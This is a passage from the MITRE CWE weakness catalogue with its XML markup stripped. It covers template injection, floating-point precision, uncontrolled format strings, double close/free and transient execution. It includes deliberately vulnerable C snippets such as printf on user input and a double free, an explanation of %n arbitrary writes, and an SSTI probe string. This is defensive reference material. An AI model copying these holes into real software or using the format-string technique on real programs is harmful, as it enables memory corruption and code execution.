in the ext4 filesystem causes an overshift condition resulting in a divide by zero - fix of CVE-2009-4307. + https://www.cve.org/CVERecord?id=CVE-2012-2100 + + + CVE-2020-8835 + An overshift in a kernel allowed out of bounds reads and writes resulting in a root takeover. + https://www.cve.org/CVERecord?id=CVE-2020-8835 + + + CVE-2015-1607 + Program is not properly handling signed bitwise left-shifts causing an overlapping memcpy memory range error. + https://www.cve.org/CVERecord?id=CVE-2015-1607 + + + CVE-2016-9842 + Compression function improperly executes a signed left shift of a negative integer. + https://www.cve.org/CVERecord?id=CVE-2016-9842 + + + CVE-2018-18445 + Some kernels improperly handle right shifts of 32 bit numbers in a 64 bit register. + https://www.cve.org/CVERecord?id=CVE-2018-18445 + + + CVE-2013-4206 + Putty has an incorrectly sized shift value resulting in an overshift. + https://www.cve.org/CVERecord?id=CVE-2013-4206 + + + CVE-2018-20788 + LED driver overshifts under certain conditions resulting in a DoS. + https://www.cve.org/CVERecord?id=CVE-2018-20788 + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2021-03-29 + 4.5 + 2021-07-20 + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples, Observed_Examples + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a template engine to insert or process externally-influenced input, but it does not neutralize or incorrectly neutralizes special elements or syntax that can be interpreted as template expressions or other code directives when processed by the engine. + + Many web applications use template engines that allow developers to insert externally-influenced values into free text or messages in order to generate a full web page, document, message, etc. Such engines include Twig, Jinja2, Pug, Java Server Pages, FreeMarker, Velocity, ColdFusion, Smarty, and many others - including PHP itself. Some CMS (Content Management Systems) also use templates. + Template engines often have their own custom command or expression language. If an attacker can influence input into a template before it is processed, then the attacker can invoke arbitrary expressions, i.e. perform injection attacks. For example, in some template languages, an attacker could inject the expression "{{7*7}}" and determine if the output returns "49" instead. The syntax varies depending on the language. + In some cases, XSS-style attacks can work, which can obscure the root cause if the developer does not closely investigate the root cause of the error. + Template engines can be used on the server or client, so both "sides" could be affected by injection. The mechanisms of attack or the affected technologies might be different, but the mistake is fundamentally the same. + + + + + + + + + + + + + + + + Server-Side Template Injection / SSTI + This term is used for injection into template engines being used by a server. + + + Client-Side Template Injection / CSTI + This term is used for injection into template engines being used by a client. + + + + + Architecture and Design + The developer might choose a template engine that makes it easier for programmers to write vulnerable code. + + + Implementation + The programmer might not use engine's built-in sandboxes or other capabilities to escape or otherwise prevent template injection from untrusted input. + + + + + Integrity + Execute Unauthorized Code or Commands + + + + + Architecture and Design + Choose a template engine that offers a sandbox or restricted mode, or at least limits the power of any available expressions, function calls, or commands. + + + Implementation + Use the template engine's sandbox or restricted mode, if available. + + + + + CVE-2017-16783 + server-side template injection in content management server + https://www.cve.org/CVERecord?id=CVE-2017-16783 + + + CVE-2020-9437 + authentication / identity management product has client-side template injection + https://www.cve.org/CVERecord?id=CVE-2020-9437 + + + CVE-2020-12790 + Server-Side Template Injection using a Twig template + https://www.cve.org/CVERecord?id=CVE-2020-12790 + + + CVE-2021-21244 + devops platform allows SSTI + https://www.cve.org/CVERecord?id=CVE-2021-21244 + + + CVE-2020-4027 + bypass of Server-Side Template Injection protection mechanism with macros in Velocity templates + https://www.cve.org/CVERecord?id=CVE-2020-4027 + + + CVE-2020-26282 + web browser proxy server allows Java EL expressions from Server-Side Template Injection + https://www.cve.org/CVERecord?id=CVE-2020-26282 + + + CVE-2020-1961 + SSTI involving mail templates and JEXL expressions + https://www.cve.org/CVERecord?id=CVE-2020-1961 + + + CVE-2019-19999 + product does not use a "safe" setting for a FreeMarker configuration, allowing SSTI + https://www.cve.org/CVERecord?id=CVE-2019-19999 + + + CVE-2018-20465 + product allows read of sensitive database username/password variables using server-side template injection + https://www.cve.org/CVERecord?id=CVE-2018-20465 + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Since expression languages are often used in templating languages, there may be some overlap with CWE-917 (Expression Language Injection). XSS (CWE-79) is also co-located with template injection. + + The interrelationships and differences between CWE-917 and CWE-1336 need to be further clarified. + + + + CWE Content Team + MITRE + 2021-07-19 + 4.5 + 2021-07-20 + + + CWE Content Team + MITRE + 2022-06-28 + updated Maintenance_Notes, Relationships + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + A hardware device is missing or has inadequate protection features to prevent overheating. + + Hardware, electrical circuits, and semiconductor silicon have thermal side effects, such that some of the energy consumed by the device gets dissipated as heat and increases the temperature of the device. For example, in semiconductors, higher-operating frequency of silicon results in higher power dissipation and heat. The leakage current in CMOS circuits increases with temperature, and this creates positive feedback that can result in thermal runaway and damage the device permanently. + Any device lacking protections such as thermal sensors, adequate platform cooling, or thermal insulation is susceptible to attacks by malicious software that might deliberately operate the device in modes that result in overheating. This can be used as an effective denial of service (DoS) or permanent denial of service (PDoS) attack. + Depending on the type of hardware device and its expected usage, such thermal overheating can also cause safety hazards and reliability issues. Note that battery failures can also cause device overheating but the mitigations and examples included in this submission cannot reliably protect against a battery failure. + There can be similar weaknesses with lack of protection from attacks based on overvoltage or overcurrent conditions. However, thermal heat is generated by hardware operation and the device should implement protection from overheating. + + + + + + + + + + + + + + + + Architecture and Design + + + Implementation + Such issues could be introduced during hardware architecture, design or implementation. + + + + + Availability + DoS: Resource Consumption (Other) + High + + + + + Dynamic Analysis with Manual Results Interpretation + Dynamic tests should be performed to stress-test temperature controls. + High + + + Architecture or Design Review + Power management controls should be part of Architecture and Design reviews. + High + + + + + Architecture and Design + Temperature maximum and minimum limits should be enforced using thermal sensors both in silicon and at the platform level. + + + Implementation + The platform should support cooling solutions such as fans that can be modulated based on device-operation needs to maintain a stable temperature. + + + + + Malicious software running on a core can execute instructions that consume maximum power or increase core frequency. Such a power-virus program could execute on the platform for an extended time to overheat the device, resulting in permanent damage. + Execution core and platform do not support thermal sensors, performance throttling, or platform-cooling countermeasures to ensure that any software executing on the system cannot cause overheating past the maximum allowable temperature. + The platform and SoC should have failsafe thermal limits that are enforced by thermal sensors that trigger critical temperature alerts when high temperature is detected. Upon detection of high temperatures, the platform should trigger cooling or shutdown automatically. + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + Arun Kanuparthi, Hareesh Khattri, Parbati Kumar Manna + Intel Corporation + 2020-05-29 + 4.3 + 2020-12-10 + + + CWE Content Team + MITRE + 2022-04-28 + updated Applicable_Platforms, Relationships + + + CWE Content Team + MITRE + 2022-06-28 + updated Applicable_Platforms + + + CWE Content Team + MITRE + 2022-10-13 + updated Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-01-31 + updated Applicable_Platforms, Related_Attack_Patterns + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product processes a real number with an implementation in which the number's representation does not preserve required accuracy and precision in its fractional part, causing an incorrect result. + When a security decision or calculation requires highly precise, accurate numbers such as financial calculations or prices, then small variations in the number could be exploited by an attacker. + There are multiple ways to store the fractional part of a real number in a computer. In all of these cases, there is a limit to the accuracy of recording a fraction. If the fraction can be represented in a fixed number of digits (binary or decimal), there might not be enough digits assigned to represent the number. In other cases the number cannot be represented in a fixed number of digits due to repeating in decimal or binary notation (e.g. 0.333333...) or due to a transcendental number such as Π or √2. Rounding of numbers can lead to situations where the computer results do not adequately match the result of sufficiently accurate math. + + + + + + + + + + + + + + + There are three major ways to store real numbers in computers. Each method is described along with the limitations of how they store their numbers. + + Fixed: Some implementations use a fixed number of binary bits to represent both the integer and the fraction. In the demonstrative example about Muller's Recurrence, the fraction 108.0 - ((815.0 - 1500.0 / z) / y) cannot be represented in 8 binary digits. The numeric accuracy within languages such as PL/1, COBOL and Ada is expressed in decimal digits rather than binary digits. In SQL and most databases, the length of the integer and the fraction are specified by the programmer in decimal. In the language C, fixed reals are implemented according to ISO/IEC TR18037 + Floating: The number is stored in a version of scientific notation with a fixed length for the base and the significand. This allows flexibility for more accuracy when the integer portion is smaller. When dealing with large integers, the fractional accuracy is less. Languages such as PL/1, COBOL and Ada set the accuracy by decimal digit representation rather than using binary digits. Python also implements decimal floating-point numbers using the IEEE 754-2008 encoding method. + Ratio: The number is stored as the ratio of two integers. These integers also have their limits. These integers can be stored in a fixed number of bits or in a vector of digits. While the vector of digits method provides for very large integers, they cannot truly represent a repeating or transcendental number as those numbers do not ever have a fixed length. + + + + + + Implementation + This weakness is introduced when the developer picks a method to represent a real number. The weakness may only be visible with very specific numeric inputs. + + + + + Availability + DoS: Crash, Exit, or Restart + This weakness will generally lead to undefined results and therefore crashes. In some implementations the program will halt if the weakness causes an overflow during a calculation. + + + Integrity + Execute Unauthorized Code or Commands + The results of the math are not as expected. This could cause issues where a value would not be properly calculated and provide an incorrect answer. + + + Confidentiality + Availability + Access Control + Read Application Data + Modify Application Data + This weakness can sometimes trigger buffer overflows which can be used to execute arbitrary code. This is usually outside the scope of a product's implicit security policy. + + + + + Implementation + Patching and Maintenance + The developer or maintainer can move to a more accurate representation of real numbers. In extreme cases, the programmer can move to representations such as ratios of BigInts which can represent real numbers to extremely fine precision. The programmer can also use the concept of an Unum real. The memory and CPU tradeoffs of this change must be examined. Since floating point reals are used in many products and many locations, they are implemented in hardware and most format changes will cause the calculations to be moved into software resulting in slower products. + + + + + Muller's Recurrence is a series that is supposed to converge to the number 5. When running this series with the following code, different implementations of real numbers fail at specific iterations: + + fn rec_float(y: f64, z: f64) -> f64 + { + + 108.0 - ((815.0 - 1500.0 / z) / y); + + } + + fn float_calc(turns: usize) -> f64 + { + + let mut x: Vec<f64> = vec![4.0, 4.25]; + (2..turns + 1).for_each(|number| + { + + x.push(rec_float(x[number - 1], x[number - 2])); + + }); + + x[turns] + + } + + + The chart below shows values for different data structures in the rust language when Muller's recurrence is executed to 80 iterations. The data structure f64 is a 64 bit float. The data structures I<number>F<number> are fixed representations 128 bits in length that use the first number as the size of the integer and the second size as the size of the fraction (e.g. I16F112 uses 16 bits for the integer and 112 bits for the fraction). The data structure of Ratio comes in three different implementations: i32 uses a ratio of 32 bit signed integers, i64 uses a ratio of 64 bit signed integers and BigInt uses a ratio of signed integer with up to 2^32 digits of base 256. Notice how even with 112 bits of fractions or ratios of 64bit unsigned integers, this math still does not converge to an expected value of 5. + + + + Use num_rational::BigRational; + + fn rec_big(y: BigRational, z: BigRational) -> BigRational + { + + BigRational::from_integer(BigInt::from(108)) + + - ((BigRational::from_integer(BigInt::from(815)) + - BigRational::from_integer(BigInt::from(1500)) / z) + / y) + + + } + + fn big_calc(turns: usize) -> BigRational + { + + let mut x: Vec<BigRational> = vec![BigRational::from_float(4.0).unwrap(), BigRational::from_float(4.25).unwrap(),]; + + (2..turns + 1).for_each(|number| + { + + x.push(rec_big(x[number - 1].clone(), x[number - 2].clone())); + + }); + x[turns].clone() + + } + + + + On February 25, 1991, during the eve of the of an Iraqi invasion of Saudi Arabia, a Scud missile fired from Iraqi positions hit a US Army barracks in Dhahran, Saudi Arabia. It miscalculated time and killed 28 people [REF-1190]. + + + + + + Sleipner A, an offshore drilling platform in the North Sea, was incorrectly constructed with an underestimate of 50% of strength in a critical cluster of buoyancy cells needed for construction. This led to a leak in buoyancy cells during lowering, causing a seismic event of 3.0 on the Richter Scale and about $700M loss [REF-1281]. + + + + + + + + CVE-2018-16069 + Chain: series of floating-point precision errors + (CWE-1339) in a web browser rendering engine causes out-of-bounds read + (CWE-125), giving access to cross-origin data + https://www.cve.org/CVERecord?id=CVE-2018-16069 + + + CVE-2017-7619 + Chain: rounding error in floating-point calculations + (CWE-1339) in image processor leads to infinite loop (CWE-835) + https://www.cve.org/CVERecord?id=CVE-2017-7619 + + + CVE-2021-29529 + Chain: machine-learning product can have a heap-based + buffer overflow (CWE-122) when some integer-oriented bounds are + calculated by using ceiling() and floor() on floating point values + (CWE-1339) + https://www.cve.org/CVERecord?id=CVE-2021-29529 + + + CVE-2008-2108 + Chain: insufficient precision (CWE-1339) in + random-number generator causes some zero bits to be reliably + generated, reducing the amount of entropy (CWE-331) + https://www.cve.org/CVERecord?id=CVE-2008-2108 + + + CVE-2006-6499 + Chain: web browser crashes due to infinite loop - "bad + looping logic [that relies on] floating point math [CWE-1339] to exit + the loop [CWE-835]" + https://www.cve.org/CVERecord?id=CVE-2006-6499 + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + CWE Content Team + MITRE + 2021-07-08 + 4.5 + 2021-07-20 + + + CWE Content Team + MITRE + 2022-10-13 + updated Demonstrative_Examples + + + CWE Content Team + MITRE + 2023-01-31 + updated Common_Consequences, Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The product uses a function that accepts a format string as an argument, but the format string originates from an external source. + + When an attacker can modify an externally-controlled format string, this can lead to buffer overflows, denial of service, or data representation problems. + It should be noted that in some circumstances, such as internationalization, the set of format strings is externally controlled by design. If the source of these format strings is trusted (e.g. only contained in library files that are only modifiable by the system administrator), then the external control might not itself pose a vulnerability. + + + + + + + + + + Primary + + + + + + + + + + Implementation + The programmer rarely intends for a format string to be externally-controlled at all. This weakness is frequently introduced in code that constructs log messages, where a constant format string is omitted. + + + Implementation + In cases such as localization and internationalization, the language-specific message repositories could be an avenue for exploitation, but the format string issue would be resultant, since attacker control of those repositories would also allow modification of message length, format, and content. + + + High + + + Confidentiality + Read Memory + Format string problems allow for information disclosure which can severely simplify exploitation of the program. + + + Integrity + Confidentiality + Availability + Modify Memory + Execute Unauthorized Code or Commands + Format string problems can result in the execution of arbitrary code. + + + + + Automated Static Analysis + This weakness can often be detected using automated static analysis tools. Many modern tools use data flow analysis or constraint-based techniques to minimize the number of false positives. + + + Black Box + Since format strings often occur in rarely-occurring erroneous conditions (e.g. for error message logging), they can be difficult to detect using black box methods. It is highly likely that many latent issues exist in executables that do not have associated source code (or equivalent source. + Limited + + + Automated Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Bytecode Weakness Analysis - including disassembler + source code weakness analysis + Binary Weakness Analysis - including disassembler + source code weakness analysis + + Cost effective for partial coverage: + + Binary / Bytecode simple extractor - strings, ELF readers, etc. + + + + High + + + Manual Static Analysis - Binary or Bytecode + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Binary / Bytecode disassembler - then use manual analysis for vulnerabilities & anomalies + + + + SOAR Partial + + + Dynamic Analysis with Automated Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Web Application Scanner + Web Services Scanner + Database Scanners + + + + SOAR Partial + + + Dynamic Analysis with Manual Results Interpretation + + According to SOAR, the following detection techniques may be useful: + + Cost effective for partial coverage: + + Fuzz Tester + Framework-based Fuzzer + + + + SOAR Partial + + + Manual Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Manual Source Code Review (not inspections) + + Cost effective for partial coverage: + + Focused Manual Spotcheck - Focused manual analysis of source + + + + High + + + Automated Static Analysis - Source Code + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Source code Weakness Analyzer + Context-configured Source Code Weakness Analyzer + + Cost effective for partial coverage: + + Warning Flags + + + + High + + + Architecture or Design Review + + According to SOAR, the following detection techniques may be useful: + + Highly cost effective: + + Formal Methods / Correct-By-Construction + + Cost effective for partial coverage: + + Inspection (IEEE 1028 standard) (can apply to requirements, design, source code, etc.) + + + + High + + + + + Requirements + Choose a language that is not subject to this flaw. + + + Implementation + Ensure that all format string functions are passed a static string which cannot be controlled by the user, and that the proper number of arguments are always sent to that function as well. If at all possible, use functions that do not support the %n operator in format strings. [REF-116] [REF-117] + + + Build and Compilation + Run compilers and linkers with high warning levels, since they may detect incorrect usage. + + + + + The following program prints a string provided as an argument. + + #include <stdio.h> + void printWrapper(char *string) { + + printf(string); + } + int main(int argc, char **argv) { + + char buf[5012];memcpy(buf, argv[1], 5012);printWrapper(argv[1]);return (0); + } + + The example is exploitable, because of the call to printf() in the printWrapper() function. Note: The stack buffer was added to make exploitation more simple. + + + The following code copies a command line argument into a buffer using snprintf(). + + int main(int argc, char **argv){char buf[128];...snprintf(buf,128,argv[1]);} + + This code allows an attacker to view the contents of the stack and write to the stack using a command line argument containing a sequence of formatting directives. The attacker can read from the stack by providing more formatting directives, such as %x, than the function takes as arguments to be formatted. (In this example, the function takes no arguments to be formatted.) By using the %n formatting directive, the attacker can write to the stack, causing snprintf() to write the number of bytes output thus far to the specified argument (rather than reading a value from the argument, which is the intended behavior). A sophisticated version of this attack will use four staggered writes to completely control the value of a pointer on the stack. + + + Certain implementations make more advanced attacks even easier by providing format directives that control the location in memory to read from or write to. An example of these directives is shown in the following code, written for glibc: + + printf("%d %d %1$d %1$d\n", 5, 9); + + This code produces the following output: 5 9 5 5 It is also possible to use half-writes (%hn) to accurately control arbitrary DWORDS in memory, which greatly reduces the complexity needed to execute an attack that would otherwise require four staggered writes, such as the one mentioned in the first example. + + + + + CVE-2002-1825 + format string in Perl program + https://www.cve.org/CVERecord?id=CVE-2002-1825 + + + CVE-2001-0717 + format string in bad call to syslog function + https://www.cve.org/CVERecord?id=CVE-2001-0717 + + + CVE-2002-0573 + format string in bad call to syslog function + https://www.cve.org/CVERecord?id=CVE-2002-0573 + + + CVE-2002-1788 + format strings in NNTP server responses + https://www.cve.org/CVERecord?id=CVE-2002-1788 + + + CVE-2006-2480 + Format string vulnerability exploited by triggering errors or warnings, as demonstrated via format string specifiers in a .bmp filename. + https://www.cve.org/CVERecord?id=CVE-2006-2480 + + + CVE-2007-2027 + Chain: untrusted search path enabling resultant format string by loading malicious internationalization messages + https://www.cve.org/CVERecord?id=CVE-2007-2027 + + + + Logging + Error Handling + String Processing + + + Memory + + + + Format string vulnerability + + + Format String + + + Format string problem + + + FIO30-C + Exclude user input from format strings + Exact + + + FIO47-C + Use valid format strings + CWE More Specific + + + A1 + Unvalidated Input + CWE More Specific + + + 6 + Format String + + + IDS06-J + Exclude user input from format strings + + + IDS30-PL + Exclude user input from format strings + Exact + + + SFP24 + Tainted input to command + + + ASCSM-CWE-134 + + + + + + + + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + + This weakness is possible in any programming language that support format strings. + + + While Format String vulnerabilities typically fall under the Buffer Overflow category, technically they are not overflowed buffers. The Format String vulnerability is fairly new (circa 1999) and stems from the fact that there is no realistic way for a function that takes a variable number of arguments to determine just how many arguments were passed in. The most common functions that take a variable number of arguments, including C-runtime functions, are the printf() family of calls. The Format String problem appears in a number of ways. A *printf() call without a format specifier is dangerous and can be exploited. For example, printf(input); is exploitable, while printf(y, input); is not exploitable in that context. The result of the first call, used incorrectly, allows for an attacker to be able to peek at stack memory since the input string will be used as the format specifier. The attacker can stuff the input string with format specifiers and begin reading stack values, since the remaining parameters will be pulled from the stack. Worst case, this improper use may give away enough control to allow an arbitrary value (or values in the case of an exploit program) to be written into the memory of the running program. + Frequently targeted entities are file names, process names, identifiers. + Format string problems are a classic C/C++ issue that are now rare due to the ease of discovery. One main reason format string vulnerabilities can be exploited is due to the %n operator. The %n operator will write the number of characters, which have been printed by the format string therefore far, to the memory pointed to by its argument. Through skilled creation of a format string, a malicious user may use values on the stack to create a write-what-where condition. Once this is achieved, they can execute arbitrary code. Other operators can be used as well; for example, a %9999s operator could also trigger a buffer overflow, or when used in file-formatting functions like fprintf, it can generate a much larger output than intended. + + Format string issues are under-studied for languages other than C. Memory or disk consumption, control flow or variable alteration, and data corruption may result from format string exploitation in applications written in other languages such as Perl, PHP, Python, etc. + + + + PLOVER + 2006-07-19 + Draft 3 + 2006-07-19 + + + KDM Analytics + 2008-08-01 + added/updated white box definitions + + + CWE Content Team + MITRE + 2008-09-08 + updated Applicable_Platforms, Common_Consequences, Detection_Factors, Modes_of_Introduction, Relationships, Other_Notes, Research_Gaps, Taxonomy_Mappings, Weakness_Ordinalities + + + CWE Content Team + MITRE + 2008-11-24 + updated Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2009-03-10 + updated Relationships + + + CWE Content Team + MITRE + 2009-05-27 + updated Demonstrative_Examples + + + KDM Analytics + 2009-07-17 + Improved the White_Box_Definition + + + CWE Content Team + MITRE + 2009-07-27 + updated White_Box_Definitions + + + CWE Content Team + MITRE + 2010-02-16 + updated Detection_Factors, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-01 + updated Common_Consequences, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2011-06-27 + updated Modes_of_Introduction, Relationships + + + CWE Content Team + MITRE + 2011-09-13 + updated Potential_Mitigations, References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2012-05-11 + updated Observed_Examples, References, Related_Attack_Patterns, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2014-07-30 + updated Demonstrative_Examples, Detection_Factors, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2015-12-07 + updated Description, Modes_of_Introduction, Name, Relationships + + + CWE Content Team + MITRE + 2017-11-08 + updated Applicable_Platforms, Causal_Nature, Functional_Areas, Likelihood_of_Exploit, Other_Notes, References, Relationships, Taxonomy_Mappings, White_Box_Definitions + + + CWE Content Team + MITRE + 2018-03-27 + updated References + + + CWE Content Team + MITRE + 2019-01-03 + updated References, Relationships, Taxonomy_Mappings + + + CWE Content Team + MITRE + 2019-06-20 + updated Relationships + + + CWE Content Team + MITRE + 2019-09-19 + updated Relationships + + + CWE Content Team + MITRE + 2020-02-24 + updated Detection_Factors, Relationships + + + CWE Content Team + MITRE + 2020-08-20 + updated Relationships + + + CWE Content Team + MITRE + 2020-12-10 + updated Common_Consequences, Relationships + + + CWE Content Team + MITRE + 2021-03-15 + updated Potential_Mitigations, Relationships + + + CWE Content Team + MITRE + 2023-01-31 + updated Description + + + CWE Content Team + MITRE + 2023-04-27 + updated References, Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + Uncontrolled Format String + + + + The product attempts to close or release a resource or handle more than once, without any successful open between the close operations. + + Code typically requires "opening" handles or references to resources such as memory, files, devices, socket connections, services, etc. When the code is finished with using the resource, it is typically expected to "close" or "release" the resource, which indicates to the environment (such as the OS) that the resource can be re-assigned or reused by unrelated processes or actors - or in some cases, within the same process. API functions or other abstractions are often used to perform this release, such as free() or delete() within C/C++, or file-handle close() operations that are used in many languages. + Unfortunately, the implementation or design of such APIs might expect the developer to be responsible for ensuring that such APIs are only called once per release of the resource. If the developer attempts to release the same resource/handle more than once, then the API's expectations are not met, resulting in undefined and/or insecure behavior. This could lead to consequences such as memory corruption, data corruption, execution path corruption, or other consequences. + Note that while the implementation for most (if not all) resource reservation allocations involve a unique identifier/pointer/symbolic reference, then if this identifier is reused, checking the identifier for resource closure may result in a false state of openness and closing of the wrong resource. For this reason, reuse of identifiers is discouraged. + + + + + + + + + + + + + + + + + + Implementation + + + + + Availability + Integrity + DoS: Crash, Exit, or Restart + Medium + + + + + Automated Static Analysis + For commonly-used APIs and resource types, automated tools often have signatures that can spot this issue. + + + Automated Dynamic Analysis + Some compiler instrumentation tools such as AddressSanitizer (ASan) can indirectly detect some instances of this weakness. + + + + + Implementation + Change the code's logic so that the resource is only closed once. This might require simplifying or refactoring. This fix can be simple to do in small code blocks, but more difficult when multiple closes are buried within complex conditionals. + + + Implementation + Refactoring + It can be effective to implement a flag that is (1) set when the resource is opened, (2) cleared when it is closed, and (3) checked before closing. This approach can be useful when there are disparate cases in which closes must be performed. However, flag-tracking can increase code complexity and requires diligent compliance by the programmer. + + + Implementation + Refactoring + When closing a resource, set the resource's associated variable to NULL or equivalent value for the given language. Some APIs will ignore this null value without causing errors. For other APIs, this can lead to application crashes or exceptions, which may still be preferable to corrupting an unintended resource such as memory or data. + Defense in Depth + + + + + This example attempts to close a file twice. In some cases, the C library fclose() function will catch the error and return an error code. In other implementations, a double-free (CWE-415) occurs, causing the program to fault. Note that the examples presented here are simplistic, and double fclose() calls will frequently be spread around a program, making them more difficult to find during code reviews. + + char b[2000]; + FILE *f = fopen("dbl_cls.c", "r"); + if (f) + { + b[0] = 0; + fread(b, 1, sizeof(b) - 1, f); + printf("%s\n'", b); + int r1 = fclose(f); + printf("\n-----------------\n1 close done '%d'\n", r1); + int r2 = fclose(f); // Double close + printf("2 close done '%d'\n", r2); + } + + There are multiple possible fixes. This fix only has one call to fclose(), which is typically the preferred handling of this problem - but this simplistic method is not always possible. + + + char b[2000]; + FILE *f = fopen("dbl_cls.c", "r"); + if (f) + { + b[0] = 0; + fread(b, 1, sizeof(b) - 1, f); + printf("%s\n'", b); + int r = fclose(f); + printf("\n-----------------\n1 close done '%d'\n", r); + } + + This fix uses a flag to call fclose() only once. Note that this flag is explicit. The variable "f" could also have been used as it will be either NULL if the file is not able to be opened or a valid pointer if the file was successfully opened. If "f" is replacing "f_flg" then "f" would need to be set to NULL after the first fclose() call so the second fclose call would never be executed. + + + char b[2000]; + int f_flg = 0; + FILE *f = fopen("dbl_cls.c", "r"); + if (f) + { + f_flg = 1; + b[0] = 0; + fread(b, 1, sizeof(b) - 1, f); + printf("%s\n'", b); + if (f_flg) + { + int r1 = fclose(f); + f_flg = 0; + printf("\n-----------------\n1 close done '%d'\n", r1); + } + if (f_flg) + { + int r2 = fclose(f); // Double close + f_flg = 0; + printf("2 close done '%d'\n", r2); + } + } + + + + The following code shows a simple example of a double free vulnerability. + + char* ptr = (char*)malloc (SIZE);...if (abrt) {free(ptr);}...free(ptr); + + Double free vulnerabilities have two common (and sometimes overlapping) causes: + + + + Error conditions and other exceptional circumstances + + + Confusion over which part of the program is responsible for freeing the memory + + + + Although some double free vulnerabilities are not much more complicated than this example, most are spread out across hundreds of lines of code or even different files. Programmers seem particularly susceptible to freeing global variables more than once. + + + + + CVE-2019-13351 + file descriptor double close can cause the wrong file to be associated with a file descriptor. + https://www.cve.org/CVERecord?id=CVE-2019-13351 + + + CVE-2006-5051 + Chain: Signal handler contains too much functionality (CWE-828), introducing a race condition that leads to a double free (CWE-415). + https://www.cve.org/CVERecord?id=CVE-2006-5051 + + + CVE-2004-0772 + Double free resultant from certain error conditions. + https://www.cve.org/CVERecord?id=CVE-2004-0772 + + + + + + + + + + Allowed + This CWE entry is at the Base level of abstraction, which is a preferred level of abstraction for mapping to the root causes of vulnerabilities. + Carefully read both the name and description to ensure that this mapping is an appropriate fit. Do not try to 'force' a mapping to a lower-level Base/Variant simply to comply with this preferred level of abstraction. + + + + + + The terms related to "release" may vary depending on the type of resource, programming language, specification, or framework. "Close" has been used synonymously for the release of resources like file descriptors and file handles. "Return" is sometimes used instead of Release. "Free" is typically used when releasing memory or buffers back into the system for reuse. + + + + + CWE Content Team + MITRE + 2021-09-07 + 4.6 + 2021-10-28 + + + CWE Content Team + MITRE + 2022-04-28 + updated Demonstrative_Examples, Description, Potential_Mitigations + + + CWE Content Team + MITRE + 2022-10-13 + updated References + + + CWE Content Team + MITRE + 2023-04-27 + updated Relationships + + + CWE Content Team + MITRE + 2023-06-29 + updated Mapping_Notes + + + + + The processor does not properly clear microarchitectural state after incorrect microcode assists or speculative execution, resulting in transient execution. + + In many processor architectures an exception, mis-speculation, or microcode assist results in a flush operation to clear results that are no longer required. This action prevents these results from influencing architectural state that is intended to be visible from software. However, traces of this transient execution may remain in microarchitectural buffers, resulting in a change in microarchitectural state that can expose sensitive information to an attacker using side-channel analysis. For example, Load Value Injection (LVI) [REF-1202] can exploit direct injection of erroneous values into intermediate load and store buffers. + Several conditions may need to be fulfilled for a successful attack: + + 1) incorrect transient execution that results in remanence of sensitive information; + 2) attacker has the ability to provoke microarchitectural exceptions; + 3) operations and structures in victim code that can be exploited must be identified. + + + + + + + + + + + + + + + + + + + Architecture and Design + + + Requirements + + + + + Confidentiality + Integrity + Modify Memory + Read Memory + Execute Unauthorized Code or Commands + Medium + + + + + Architecture and Design + Requirements + Hardware ensures that no illegal data flows from faulting micro-ops exists at the microarchitectural level. + High + Being implemented in silicon it is expected to fully address the known weaknesses with limited performance impact. + + + Build and Compilation + Include instructions that explicitly remove traces of unneeded computations from software interactions with microarchitectural elements e.g. lfence, sfence, mfence, clflush. + High + This effectively forces the processor to complete each memory access before moving on to the next operation. This may have a large performance impact. + + + + + Faulting loads in a victim domain may trigger incorrect transient forwarding, which leaves secret-dependent traces in the microarchitectural state. Consider this example from [REF-1203]. + Consider the code gadget: + + + void call_victim(size_t untrusted_arg) { + + *arg_copy = untrusted_arg; + array[**trusted_ptr * 4096]; + + } + + + A processor with this weakness will store the value of untrusted_arg (which may be provided 